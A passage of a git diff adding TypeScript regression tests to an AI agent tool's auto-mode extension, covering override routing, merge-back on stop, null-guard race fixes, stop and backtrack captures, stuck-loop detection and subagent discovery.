+    // overrides must go to the project root.
+    const autoRunning = false; // no live session
+    const wtPath = autoRunning ? getAutoWorktreePath(projectRoot, "M001") : null;
+    const targetPath = wtPath ?? projectRoot;
+
+    await appendOverride(targetPath, "Should go to project root", "M001/S01/T01");
+
+    const rootOverrides = join(projectRoot, ".gsd", "OVERRIDES.md");
+    const wtOverrides = join(worktreePath, ".gsd", "OVERRIDES.md");
+
+    assert.ok(existsSync(rootOverrides), "override written to project root");
+    assert.ok(!existsSync(wtOverrides), "override NOT written to inactive worktree");
+  });
+
+  test("override routing: active worktree with valid .git should receive overrides", async () => {
+    // Simulate the handleSteer path-resolution logic with active auto-mode.
+    // getAutoWorktreePath requires a valid .git file, so even with autoRunning=true,
+    // it returns null for our test worktree (no real .git). This confirms the
+    // double-gate: both autoRunning AND valid worktree must be true.
+    const autoRunning = true;
+    const wtPath = autoRunning ? getAutoWorktreePath(projectRoot, "M001") : null;
+    const targetPath = wtPath ?? projectRoot;
+
+    // Without a valid .git file, falls back to project root
+    await appendOverride(targetPath, "Falls back without .git", "M001/S01/T01");
+
+    const rootOverrides = join(projectRoot, ".gsd", "OVERRIDES.md");
+    assert.ok(existsSync(rootOverrides), "override written to project root (no valid .git in worktree)");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/stop-auto-merge-back.test.ts b/src/resources/extensions/gsd/tests/stop-auto-merge-back.test.ts
new file mode 100644
index 000000000..464c69c33
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stop-auto-merge-back.test.ts
@@ -0,0 +1,67 @@
+/**
+ * stop-auto-merge-back.test.ts — Regression test for #2317.
+ *
+ * When auto-mode stops after a milestone is complete, stopAuto should trigger
+ * merge-back (mergeAndExit) instead of just exiting the worktree with
+ * preserveBranch: true. Otherwise milestone code stays stranded on the
+ * worktree branch and never reaches main.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Source analysis: stopAuto calls mergeAndExit for complete milestones ────
+
+const autoSrcPath = join(import.meta.dirname, "..", "auto.ts");
+const autoSrc = readFileSync(autoSrcPath, "utf-8");
+
+test("#2317: stopAuto should check milestone completion status before choosing exit strategy", () => {
+  // stopAuto Step 4 should NOT unconditionally call exitMilestone(preserveBranch: true).
+  // It should check if the milestone is complete and call mergeAndExit instead.
+
+  // Find the Step 4 section
+  const step4Idx = autoSrc.indexOf("Step 4: Auto-worktree exit");
+  assert.ok(step4Idx !== -1, "Step 4 comment exists in stopAuto");
+
+  // Extract a reasonable window around Step 4 (up to Step 5)
+  const step5Idx = autoSrc.indexOf("Step 5:", step4Idx);
+  const step4Block = autoSrc.slice(step4Idx, step5Idx);
+
+  // The fix: Step 4 should call mergeAndExit when milestone is complete
+  assert.ok(
+    step4Block.includes("mergeAndExit"),
+    "Step 4 should call mergeAndExit for completed milestones",
+  );
+});
+
+test("#2317: stopAuto should detect milestone completion via SUMMARY file or DB", () => {
+  const step4Idx = autoSrc.indexOf("Step 4: Auto-worktree exit");
+  const step5Idx = autoSrc.indexOf("Step 5:", step4Idx);
+  const step4Block = autoSrc.slice(step4Idx, step5Idx);
+
+  // Should check completion status — either via SUMMARY file, DB getMilestone, or phase
+  const checksCompletion =
+    step4Block.includes("SUMMARY") ||
+    step4Block.includes("getMilestone") ||
+    step4Block.includes("complete") ||
+    step4Block.includes("isMilestoneComplete");
+
+  assert.ok(
+    checksCompletion,
+    "Step 4 should check if milestone is complete before deciding exit strategy",
+  );
+});
+
+test("#2317: stopAuto still preserves branch for incomplete milestones", () => {
+  const step4Idx = autoSrc.indexOf("Step 4: Auto-worktree exit");
+  const step5Idx = autoSrc.indexOf("Step 5:", step4Idx);
+  const step4Block = autoSrc.slice(step4Idx, step5Idx);
+
+  // preserveBranch should still be used as fallback for non-complete milestones
+  assert.ok(
+    step4Block.includes("preserveBranch"),
+    "Step 4 should still preserve branch for incomplete milestones (fallback path)",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/stop-auto-race-null-unit.test.ts b/src/resources/extensions/gsd/tests/stop-auto-race-null-unit.test.ts
new file mode 100644
index 000000000..d5883a14b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stop-auto-race-null-unit.test.ts
@@ -0,0 +1,106 @@
+/**
+ * stop-auto-race-null-unit.test.ts — Regression test for #2939.
+ *
+ * When the user stops auto-mode while a unit is executing, stopAuto()
+ * calls s.reset() which sets s.currentUnit = null. The resumed
+ * runUnitPhase() then hits s.currentUnit.startedAt on the closeout
+ * line and throws a TypeError.
+ *
+ * The fix adds null guards (matching the existing pattern at lines 136
+ * and 344) so that closeout and subsequent accesses are skipped when
+ * s.currentUnit has been nulled by a concurrent stopAuto().
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const phasesPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const phasesSrc = readFileSync(phasesPath, "utf-8");
+
+console.log("\n=== #2939: stopAuto race — null guard on s.currentUnit in closeout ===");
+
+// ── Test 1: closeoutUnit call is guarded by if (s.currentUnit) ──────────
+// The closeout block starting around the "Immediate unit closeout" comment
+// must be wrapped in an `if (s.currentUnit)` guard, matching the pattern
+// already used at lines 136 and 344.
+
+const closeoutComment = "Immediate unit closeout";
+const closeoutIdx = phasesSrc.indexOf(closeoutComment);
+assertTrue(
+  closeoutIdx > 0,
+  "phases.ts contains the 'Immediate unit closeout' comment block",
+);
+
+// Extract the region from the closeout comment to the next section comment
+const closeoutRegion = phasesSrc.slice(closeoutIdx, closeoutIdx + 500);
+assertTrue(
+  closeoutRegion.includes("if (s.currentUnit)"),
+  "closeoutUnit call is guarded by `if (s.currentUnit)` check (#2939)",
+);
+
+// ── Test 2: zero-tool-call guard uses s.currentUnit?.startedAt ──────────
+// The zero-tool-call section accesses s.currentUnit!.startedAt (non-null
+// assertion) which will throw if currentUnit is null.
+
+const zeroToolComment = "Zero tool-call guard";
+const zeroToolIdx = phasesSrc.indexOf(zeroToolComment);
+assertTrue(
+  zeroToolIdx > 0,
+  "phases.ts contains the 'Zero tool-call guard' comment block",
+);
+
+const zeroToolRegion = phasesSrc.slice(zeroToolIdx, zeroToolIdx + 600);
+
+// The non-null assertion `s.currentUnit!.startedAt` must be replaced with
+// optional chaining `s.currentUnit?.startedAt`
+assertTrue(
+  !zeroToolRegion.includes("s.currentUnit!.startedAt"),
+  "zero-tool-call guard no longer uses non-null assertion on s.currentUnit (#2939)",
+);
+
+// ── Test 3: return value uses optional chaining for startedAt ───────────
+// The final return at the end of runUnitPhase uses s.currentUnit.startedAt
+// which will throw if currentUnit was nulled. It must use optional chaining.
+
+// Find the last return statement in runUnitPhase that references startedAt.
+// There are two: one inside the zero-tool-call block and one at the end.
+// Both must use s.currentUnit?.startedAt
+
+// Count unguarded s.currentUnit.startedAt (without optional chaining)
+// after the "Immediate unit closeout" comment. All of them should use
+// optional chaining or be inside a guard.
+const afterCloseout = phasesSrc.slice(closeoutIdx);
+
+// Count s.currentUnit!.startedAt (non-null assertion — always unsafe)
+const nonNullPattern = /s\.currentUnit!\.startedAt/g;
+const nonNullAfterCloseout = [...afterCloseout.matchAll(nonNullPattern)];
+assertTrue(
+  nonNullAfterCloseout.length === 0,
+  `no non-null assertions s.currentUnit!.startedAt after closeout comment (found ${nonNullAfterCloseout.length}, expected 0) (#2939)`,
+);
+
+// Count bare s.currentUnit.startedAt that are NOT inside an if (s.currentUnit) guard.
+// The closeout block itself uses s.currentUnit.startedAt inside a guard — that's fine.
+// But any usage outside a guard block (e.g. in a return statement) must use optional chaining.
+// We check that all return statements use optional chaining.
+const returnWithBareAccess = /return\s*\{[^}]*s\.currentUnit\.startedAt/g;
+const bareReturnCount = [...afterCloseout.matchAll(returnWithBareAccess)].length;
+assertTrue(
+  bareReturnCount === 0,
+  `no return statements use bare s.currentUnit.startedAt (found ${bareReturnCount}, expected 0) (#2939)`,
+);
+
+// ── Test 4: the return at end of runUnitPhase uses optional chaining ────
+// The final `return { action: "next", data: { unitStartedAt: s.currentUnit?.startedAt } }`
+// must use optional chaining.
+
+const finalReturnPattern = /unitStartedAt:\s*s\.currentUnit\?\.startedAt/;
+assertTrue(
+  finalReturnPattern.test(afterCloseout),
+  "final return uses s.currentUnit?.startedAt with optional chaining (#2939)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/stop-auto-remote.test.ts b/src/resources/extensions/gsd/tests/stop-auto-remote.test.ts
index 082827e0c..3fb025241 100644
--- a/src/resources/extensions/gsd/tests/stop-auto-remote.test.ts
+++ b/src/resources/extensions/gsd/tests/stop-auto-remote.test.ts
@@ -64,7 +64,7 @@ test("stopAutoRemote cleans up stale lock (dead PID) and returns found:false", (
   const base = makeTmpBase();
   try {
     // Write a lock with a PID that doesn't exist
-    writeLock(base, "execute-task", "M001/S01/T01", 3);
+    writeLock(base, "execute-task", "M001/S01/T01");
     // Overwrite PID to a dead one
     const lock = readCrashLock(base)!;
     const staleData = { ...lock, pid: 999999999 };
@@ -111,7 +111,6 @@ test("stopAutoRemote sends SIGTERM to a live process and returns found:true", {
       unitType: "execute-task",
       unitId: "M001/S01/T01",
       unitStartedAt: new Date().toISOString(),
-      completedUnits: 0,
     };
     writeFileSync(join(base, ".gsd", "auto.lock"), JSON.stringify(lockData, null, 2), "utf-8");
 
@@ -143,7 +142,7 @@ test("lock file should be discoverable at project root, not worktree path", () =
 
   try {
     // Simulate: auto-mode writes lock to project root (the fix)
-    writeLock(projectRoot, "execute-task", "M001/S01/T01", 0);
+    writeLock(projectRoot, "execute-task", "M001/S01/T01");
 
     // Second terminal checks project root — should find the lock
     const lock = readCrashLock(projectRoot);
diff --git a/src/resources/extensions/gsd/tests/stop-backtrack.test.ts b/src/resources/extensions/gsd/tests/stop-backtrack.test.ts
new file mode 100644
index 000000000..8773ed236
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stop-backtrack.test.ts
@@ -0,0 +1,216 @@
+/**
+ * Unit tests for stop/backtrack capture classifications and milestone regression (#3487).
+ *
+ * Tests:
+ * - "stop" and "backtrack" are valid classification types
+ * - loadStopCaptures returns unexecuted stop+backtrack captures
+ * - loadBacktrackCaptures returns only backtrack captures
+ * - revertExecutorResolvedCaptures reverts silenced captures
+ * - executeBacktrack writes trigger and regression markers
+ * - readBacktrackTrigger parses trigger file
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, readFileSync, writeFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { isClosedStatus } from "../status-guards.ts";
+import {
+  appendCapture,
+  loadAllCaptures,
+  loadStopCaptures,
+  loadBacktrackCaptures,
+  markCaptureResolved,
+  revertExecutorResolvedCaptures,
+  hasPendingCaptures,
+} from "../captures.ts";
+import {
+  executeBacktrack,
+  readBacktrackTrigger,
+} from "../triage-resolution.ts";
+
+function makeTempDir(prefix: string): string {
+  const dir = join(
+    tmpdir(),
+    `${prefix}-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+  );
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function setupGsdDir(tmp: string): void {
+  mkdirSync(join(tmp, ".gsd"), { recursive: true });
+}
+
+// ─── Classification Types ─────────────────────────────────────────────────────
+
+test("stop is a valid classification", () => {
+  const tmp = makeTempDir("stop-class");
+  setupGsdDir(tmp);
+  const id = appendCapture(tmp, "stop running immediately");
+  markCaptureResolved(tmp, id, "stop", "Halt auto-mode", "User said stop", "M005");
+  const all = loadAllCaptures(tmp);
+  const cap = all.find(c => c.id === id);
+  assert.equal(cap?.classification, "stop");
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test("backtrack is a valid classification", () => {
+  const tmp = makeTempDir("bt-class");
+  setupGsdDir(tmp);
+  const id = appendCapture(tmp, "restart from M003");
+  markCaptureResolved(tmp, id, "backtrack", "Backtrack to M003", "User wants to restart", "M005");
+  const all = loadAllCaptures(tmp);
+  const cap = all.find(c => c.id === id);
+  assert.equal(cap?.classification, "backtrack");
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+// ─── loadStopCaptures ─────────────────────────────────────────────────────────
+
+test("loadStopCaptures returns unexecuted stop and backtrack captures", () => {
+  const tmp = makeTempDir("load-stop");
+  setupGsdDir(tmp);
+  const stopId = appendCapture(tmp, "halt execution");
+  const btId = appendCapture(tmp, "go back to M003");
+  const noteId = appendCapture(tmp, "just a note");
+  markCaptureResolved(tmp, stopId, "stop", "Halt", "User stop", "M005");
+  markCaptureResolved(tmp, btId, "backtrack", "Backtrack to M003", "User backtrack", "M005");
+  markCaptureResolved(tmp, noteId, "note", "Info only", "Not actionable", "M005");
+
+  const stops = loadStopCaptures(tmp);
+  assert.equal(stops.length, 2);
+  assert.ok(stops.some(c => c.classification === "stop"));
+  assert.ok(stops.some(c => c.classification === "backtrack"));
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test("loadBacktrackCaptures returns only backtrack captures", () => {
+  const tmp = makeTempDir("load-bt");
+  setupGsdDir(tmp);
+  const stopId = appendCapture(tmp, "halt execution");
+  const btId = appendCapture(tmp, "go back to M003");
+  markCaptureResolved(tmp, stopId, "stop", "Halt", "User stop", "M005");
+  markCaptureResolved(tmp, btId, "backtrack", "Backtrack to M003", "User backtrack", "M005");
+
+  const bts = loadBacktrackCaptures(tmp);
+  assert.equal(bts.length, 1);
+  assert.equal(bts[0].classification, "backtrack");
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+// ─── revertExecutorResolvedCaptures ───────────────────────────────────────────
+
+test("revertExecutorResolvedCaptures reverts captures resolved without classification", () => {
+  const tmp = makeTempDir("revert-exec");
+  setupGsdDir(tmp);
+  const id = appendCapture(tmp, "stop everything");
+
+  // Simulate an executor writing Status: resolved directly (no classification)
+  const capPath = join(tmp, ".gsd", "CAPTURES.md");
+  let content = readFileSync(capPath, "utf-8");
+  content = content.replace("**Status:** pending", "**Status:** resolved");
+  writeFileSync(capPath, content, "utf-8");
+
+  // Verify it's now "resolved" without classification
+  assert.equal(hasPendingCaptures(tmp), false);
+
+  // Revert should detect and fix it
+  const reverted = revertExecutorResolvedCaptures(tmp);
+  assert.equal(reverted, 1);
+
+  // Should be pending again
+  assert.equal(hasPendingCaptures(tmp), true);
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test("revertExecutorResolvedCaptures does NOT revert properly triaged captures", () => {
+  const tmp = makeTempDir("revert-skip");
+  setupGsdDir(tmp);
+  const id = appendCapture(tmp, "restart from M003");
+  markCaptureResolved(tmp, id, "backtrack", "Backtrack to M003", "User wants restart", "M005");
+
+  // This capture was properly triaged — should NOT be reverted
+  const reverted = revertExecutorResolvedCaptures(tmp);
+  assert.equal(reverted, 0);
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+// ─── executeBacktrack ─────────────────────────────────────────────────────────
+
+test("executeBacktrack writes trigger and regression markers", () => {
+  const tmp = makeTempDir("exec-bt");
+  setupGsdDir(tmp);
+
+  // Create target milestone directory
+  mkdirSync(join(tmp, ".gsd", "milestones", "M003"), { recursive: true });
+
+  const targetMid = executeBacktrack(tmp, "M005", {
+    id: "CAP-test123",
+    text: "restart from M003 — milestones after 2 failed",
+    timestamp: new Date().toISOString(),
+    status: "resolved",
+    classification: "backtrack",
+    resolution: "Backtrack to M003",
+    rationale: "User directive",
+  });
+
+  assert.equal(targetMid, "M003");
+
+  // Check trigger file exists
+  const triggerPath = join(tmp, ".gsd", "BACKTRACK-TRIGGER.md");
+  assert.ok(existsSync(triggerPath));
+  const triggerContent = readFileSync(triggerPath, "utf-8");
+  assert.ok(triggerContent.includes("M005"));
+  assert.ok(triggerContent.includes("M003"));
+
+  // Check regression marker exists on target milestone
+  const regressionPath = join(tmp, ".gsd", "milestones", "M003", "M003-REGRESSION.md");
+  assert.ok(existsSync(regressionPath));
+  const regressionContent = readFileSync(regressionPath, "utf-8");
+  assert.ok(regressionContent.includes("M005"));
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+// ─── readBacktrackTrigger ─────────────────────────────────────────────────────
+
+test("readBacktrackTrigger parses trigger file", () => {
+  const tmp = makeTempDir("read-bt");
+  setupGsdDir(tmp);
+  mkdirSync(join(tmp, ".gsd", "milestones", "M003"), { recursive: true });
+
+  executeBacktrack(tmp, "M005", {
+    id: "CAP-abc",
+    text: "go back to M003",
+    timestamp: new Date().toISOString(),
+    status: "resolved",
+    classification: "backtrack",
+    resolution: "Backtrack to M003",
+    rationale: "Regression",
+  });
+
+  const trigger = readBacktrackTrigger(tmp);
+  assert.ok(trigger);
+  assert.equal(trigger.target, "M003");
+  assert.equal(trigger.from, "M005");
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test("readBacktrackTrigger returns null when no trigger exists", () => {
+  const tmp = makeTempDir("no-bt");
+  setupGsdDir(tmp);
+  const trigger = readBacktrackTrigger(tmp);
+  assert.equal(trigger, null);
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+// ─── Slice Skip Status (#3477) ──────────────────────────────────────────────
+
+test("isClosedStatus treats 'skipped' as closed", () => {
+  assert.equal(isClosedStatus("skipped"), true);
+  assert.equal(isClosedStatus("complete"), true);
+  assert.equal(isClosedStatus("done"), true);
+  assert.equal(isClosedStatus("pending"), false);
+  assert.equal(isClosedStatus("active"), false);
+});
diff --git a/src/resources/extensions/gsd/tests/stuck-detection-coverage.test.ts b/src/resources/extensions/gsd/tests/stuck-detection-coverage.test.ts
new file mode 100644
index 000000000..992e6375b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/stuck-detection-coverage.test.ts
@@ -0,0 +1,217 @@
+// GSD State Machine Regression Tests — Stuck Detection Coverage (#3161)
+
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import { detectStuck } from "../auto/detect-stuck.ts";
+
+// ─── Baseline: window too small ──────────────────────────────────────────────
+
+test("returns null for empty window", () => {
+  assert.equal(detectStuck([]), null);
+});
+
+test("returns null for single entry", () => {
+  assert.equal(detectStuck([{ key: "A" }]), null);
+});
+
+test("returns null for two different entries without errors", () => {
+  assert.equal(detectStuck([{ key: "A" }, { key: "B" }]), null);
+});
+
+// ─── Rule 1: Same error repeated consecutively ───────────────────────────────
+
+test("Rule 1: same error twice consecutively triggers stuck", () => {
+  const result = detectStuck([
+    { key: "A", error: "ENOENT: no such file" },
+    { key: "A", error: "ENOENT: no such file" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(result!.reason.includes("Same error"), `reason was: ${result!.reason}`);
+});
+
+test("Rule 1: different errors do not trigger stuck", () => {
+  // Only 2 entries with different errors — Rule 2 needs 3 entries, so null.
+  const result = detectStuck([
+    { key: "A", error: "err1" },
+    { key: "A", error: "err2" },
+  ]);
+  assert.equal(result, null);
+});
+
+test("Rule 1: only last two entries matter for error check", () => {
+  // First two share an error, but the last two have distinct errors — no trigger.
+  const result = detectStuck([
+    { key: "A", error: "same-error" },
+    { key: "A", error: "same-error" },
+    { key: "B", error: "different-error-1" },
+    { key: "C", error: "different-error-2" },
+  ]);
+  assert.equal(result, null);
+});
+
+// ─── Rule 2: Same unit key 3+ consecutive times ───────────────────────────────
+
+test("Rule 2: same unit key 3 consecutive times triggers stuck", () => {
+  const result = detectStuck([
+    { key: "A" },
+    { key: "A" },
+    { key: "A" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(
+    result!.reason.includes("3 consecutive times"),
+    `reason was: ${result!.reason}`,
+  );
+});
+
+test("Rule 2: same key twice is not enough", () => {
+  assert.equal(detectStuck([{ key: "A" }, { key: "A" }]), null);
+});
+
+test("Rule 2: interrupted sequence does not trigger", () => {
+  // A, B, A — last three are not all the same key.
+  assert.equal(
+    detectStuck([{ key: "A" }, { key: "B" }, { key: "A" }]),
+    null,
+  );
+});
+
+// ─── Rule 3: Oscillation A→B→A→B ─────────────────────────────────────────────
+
+test("Rule 3: A-B-A-B oscillation triggers stuck", () => {
+  const result = detectStuck([
+    { key: "A" },
+    { key: "B" },
+    { key: "A" },
+    { key: "B" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(
+    result!.reason.includes("Oscillation"),
+    `reason was: ${result!.reason}`,
+  );
+});
+
+test("Rule 3: A-B-A-C does not trigger oscillation", () => {
+  assert.equal(
+    detectStuck([{ key: "A" }, { key: "B" }, { key: "A" }, { key: "C" }]),
+    null,
+  );
+});
+
+test("Rule 3: A-A-A-A triggers Rule 2 not Rule 3", () => {
+  // Rule 2 fires first (last 3 are all the same key).
+  const result = detectStuck([
+    { key: "A" },
+    { key: "A" },
+    { key: "A" },
+    { key: "A" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(
+    result!.reason.includes("3 consecutive times"),
+    `expected Rule 2 reason but got: ${result!.reason}`,
+  );
+  assert.ok(
+    !result!.reason.includes("Oscillation"),
+    `unexpectedly matched Rule 3: ${result!.reason}`,
+  );
+});
+
+// ─── Rule 4: ENOENT same path twice in window (#3575) ───────────────────────
+
+test("Rule 4: same ENOENT path in two entries triggers stuck", () => {
+  const result = detectStuck([
+    { key: "A", error: "ENOENT: no such file or directory, access '/home/user/.gsd/agent/skills/debug-like-expert/SKILL.md'" },
+    { key: "B" },
+    { key: "A", error: "ENOENT: no such file or directory, access '/home/user/.gsd/agent/skills/debug-like-expert/SKILL.md'" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(result!.reason.includes("Missing file"), `reason was: ${result!.reason}`);
+  assert.ok(result!.reason.includes("ENOENT"), `reason was: ${result!.reason}`);
+});
+
+test("Rule 4: different ENOENT paths do not trigger stuck", () => {
+  const result = detectStuck([
+    { key: "A", error: "ENOENT: no such file or directory, access '/path/a'" },
+    { key: "B", error: "ENOENT: no such file or directory, access '/path/b'" },
+  ]);
+  assert.equal(result, null);
+});
+
+test("Rule 4: single ENOENT does not trigger stuck", () => {
+  const result = detectStuck([
+    { key: "A", error: "ENOENT: no such file or directory, access '/path/a'" },
+    { key: "B" },
+  ]);
+  assert.equal(result, null);
+});
+
+test("Rule 4: ENOENT paths non-consecutive still triggers", () => {
+  const result = detectStuck([
+    { key: "A", error: "ENOENT: no such file or directory, access '/missing/skill'" },
+    { key: "B" },
+    { key: "C" },
+    { key: "D", error: "ENOENT: no such file or directory, access '/missing/skill'" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(result!.reason.includes("/missing/skill"), `reason was: ${result!.reason}`);
+});
+
+
+// ─── Gap documentation: 3-unit cycle evades detection ────────────────────────
+
+test("Three-unit cycle A-B-C-A-B-C does NOT trigger stuck (documents gap L13)", () => {
+  // None of the three rules fires for a 3-unit repeating cycle.
+  // This test intentionally documents the coverage gap where such cycles
+  // slip through undetected (#3161).
+  const result = detectStuck([
+    { key: "A" },
+    { key: "B" },
+    { key: "C" },
+    { key: "A" },
+    { key: "B" },
+    { key: "C" },
+  ]);
+  assert.equal(result, null);
+});
+
+// ─── Window boundary: earlier patterns do not contaminate recent check ─────────
+
+test("window bounded: detection uses last N entries correctly", () => {
+  // The first three entries would trigger Rule 2, but the last entries are
+  // healthy — only the tail matters.
+  const result = detectStuck([
+    { key: "X" },
+    { key: "X" },
+    { key: "X" }, // would be stuck if this were the end
+    { key: "A" },
+    { key: "B" }, // last two: different keys, no error
+  ]);
+  assert.equal(result, null);
+});
+
+// ─── Rule priority: Rule 1 before Rule 2 ─────────────────────────────────────
+
+test("Rule 1 takes priority over Rule 2 when both match", () => {
+  // Last 3 entries share the same key (Rule 2 candidate) AND last 2 share
+  // the same error (Rule 1 candidate). Rule 1 is evaluated first.
+  const result = detectStuck([
+    { key: "A", error: "boom" },
+    { key: "A", error: "boom" },
+    { key: "A", error: "boom" },
+  ]);
+  assert.notEqual(result, null);
+  assert.equal(result!.stuck, true);
+  assert.ok(
+    result!.reason.includes("Same error"),
+    `expected Rule 1 reason but got: ${result!.reason}`,
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/subagent-agent-discovery.test.ts b/src/resources/extensions/gsd/tests/subagent-agent-discovery.test.ts
new file mode 100644
index 000000000..5d8a6bd12
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/subagent-agent-discovery.test.ts
@@ -0,0 +1,91 @@
+import assert from "node:assert/strict";
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import test from "node:test";
+
+import { discoverAgents } from "../../subagent/agents.ts";
+
+function makeProjectRoot(t: test.TestContext): string {
+	const root = mkdtempSync(join(tmpdir(), "gsd-subagent-agents-"));
+	t.after(() => rmSync(root, { recursive: true, force: true }));
+	return root;
+}
+
+function writeAgent(root: string, configDirName: ".gsd" | ".pi", name = "ping"): string {
+	const agentsDir = join(root, configDirName, "agents");
+	mkdirSync(agentsDir, { recursive: true });
+	writeFileSync(
+		join(agentsDir, `${name}.md`),
+		`---\nname: ${name}\ndescription: ${name} agent\n---\nSay hello\n`,
+	);
+	return agentsDir;
+}
+
+test("discoverAgents finds project agents in .gsd/agents", (t) => {
+	const root = makeProjectRoot(t);
+	const agentsDir = writeAgent(root, ".gsd");
+
+	const discovery = discoverAgents(root, "project");
+
+	assert.equal(discovery.projectAgentsDir, agentsDir);
+	assert.deepEqual(discovery.agents.map((agent) => agent.name), ["ping"]);
+	assert.equal(discovery.agents[0]?.source, "project");
+});
+
+test("discoverAgents falls back to legacy .pi/agents when needed", (t) => {
+	const root = makeProjectRoot(t);
+	const agentsDir = writeAgent(root, ".pi");
+
+	const discovery = discoverAgents(root, "project");
+
+	assert.equal(discovery.projectAgentsDir, agentsDir);
+	assert.deepEqual(discovery.agents.map((agent) => agent.name), ["ping"]);
+});
+
+test("discoverAgents accepts tools frontmatter as a YAML list", (t) => {
+	const root = makeProjectRoot(t);
+	const agentsDir = join(root, ".gsd", "agents");
+	mkdirSync(agentsDir, { recursive: true });
+	writeFileSync(
+		join(agentsDir, "reviewer.md"),
+		[
+			"---",
+			"name: reviewer",
+			"description: review agent",
+			"tools:",
+			"  - bash",
+			"  - read",
+			"---",
+			"Review code",
+			"",
+		].join("\n"),
+	);
+
+	const discovery = discoverAgents(root, "project");
+
+	assert.deepEqual(discovery.agents.map((agent) => agent.name), ["reviewer"]);
+	assert.deepEqual(discovery.agents[0]?.tools, ["bash", "read"]);
+});
+
+test("discoverAgents still accepts comma-separated tools frontmatter", (t) => {
+	const root = makeProjectRoot(t);
+	const agentsDir = join(root, ".gsd", "agents");
+	mkdirSync(agentsDir, { recursive: true });
+	writeFileSync(
+		join(agentsDir, "reviewer.md"),
+		[
+			"---",
+			"name: reviewer",
+			"description: review agent",
+			"tools: bash, read",
+			"---",
+			"Review code",
+			"",
+		].join("\n"),
+	);
+
+	const discovery = discoverAgents(root, "project");
+
+	assert.deepEqual(discovery.agents[0]?.tools, ["bash", "read"]);
+});
diff --git a/src/resources/extensions/gsd/tests/summary-render-parity.test.ts b/src/resources/extensions/gsd/tests/summary-render-parity.test.ts
new file mode 100644
index 000000000..ffd4fc955
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/summary-render-parity.test.ts
@@ -0,0 +1,221 @@
+/**
+ * summary-render-parity.test.ts — Regression test for #2720
+ *
+ * Asserts that the SUMMARY.md produced at task-completion time
+ * (renderSummaryMarkdown in complete-task.ts) is structurally identical
+ * to the SUMMARY.md produced at projection-regeneration time
+ * (renderSummaryContent in workflow-projections.ts).
+ *
+ * Both render paths receive equivalent data (CompleteTaskParams vs TaskRow)
+ * and must produce the same output. If they diverge, projection regeneration
+ * silently replaces richer content with a stripped-down version.
+ */
+
+import { createTestContext } from './test-helpers.ts';
+import { renderSummaryContent } from '../workflow-projections.ts';
+import type { TaskRow } from '../gsd-db.ts';
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Fixtures — same logical data in both shapes
+// ═══════════════════════════════════════════════════════════════════════════
+
+const SLICE_ID = "S01";
+const MILESTONE_ID = "M001";
+
+const taskRow: TaskRow = {
+  milestone_id: MILESTONE_ID,
+  slice_id: SLICE_ID,
+  id: "T01",
+  title: "Implement widget parser",
+  status: "complete",
+  one_liner: "Implement widget parser",
+  narrative: "Added a recursive descent parser for widget DSL.",
+  verification_result: "All 42 unit tests pass; linter clean.",
+  duration: "2h",
+  completed_at: "2025-01-15T10:30:00.000Z",
+  blocker_discovered: false,
+  deviations: "Switched from PEG to hand-rolled parser for perf.",
+  known_issues: "No known issues.",
+  key_files: ["src/parser.ts", "src/lexer.ts"],
+  key_decisions: ["Hand-rolled parser over PEG for 3x throughput"],
+  full_summary_md: "",
+  description: "",
+  estimate: "",
+  files: [],
+  verify: "",
+  inputs: [],
+  expected_output: [],
+  observability_impact: "",
+  full_plan_md: "",
+  sequence: 1,
+};
+
+const verificationEvidence = [
+  { command: "npm test", exitCode: 0, verdict: "42/42 passed ✅", durationMs: 3200 },
+  { command: "npm run lint", exitCode: 0, verdict: "No warnings ✅", durationMs: 1100 },
+];
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+// Test 1: renderSummaryContent includes Verification section
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("## Verification"),
+    "renderSummaryContent must include a ## Verification section",
+  );
+}
+
+// Test 2: renderSummaryContent includes Verification Evidence table
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID, verificationEvidence);
+  assertTrue(
+    output.includes("## Verification Evidence"),
